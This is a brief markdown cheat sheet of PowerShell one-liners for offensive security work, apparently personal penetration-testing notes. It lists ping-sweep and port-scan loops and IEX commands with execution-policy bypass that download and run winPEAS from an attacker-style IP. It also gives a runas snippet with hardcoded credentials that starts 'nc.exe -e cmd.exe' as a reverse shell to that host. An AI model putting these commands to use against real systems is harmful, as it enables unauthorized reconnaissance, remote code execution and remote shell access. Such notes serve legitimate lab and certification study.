# powershell
- ping scan
`1..254 | ForEach-Object {Get-WmiObject Win32_PingStatus -Filter "Address='172.16.2.$_' and Timeout=200 and ResolveAddressNames='true' and StatusCode=0" | select ProtocolAddress*}`

- port scan
`1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("IP ADR",$_)) "Port $_ is open!"} 2>$null`


- powershell PSDrive (network share)
`New-PSDrive M FileSystem \\192.168.119.235\T`


`powershell -nop -noninter -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.235/winpeas.bat')"`
`powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadFile('http://192.168.119.235/winPEAS.bat','winpeas.bat')"`

- runas
```powershell
$username = 'alice'
$password = 'aliceishere'

$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
Start-Process nc.exe -ArgumentList "-e cmd.exe 192.168.119.235 444" -Credential $credential
```

# OR
`powershell Start-Process cmd.exe -Credential (New-Object System.Management.Automation.PSCredential 'username', (ConvertTo-SecureString 'password' -AsPlainText -Force))`


- Web client (curl like)
`(New-Object System.Net.WebClient).DownloadString("http://localhost/")`


- Unzip
`Expand-Archive -Force C:\path\to\archive.zip C:\where\to\extract\to`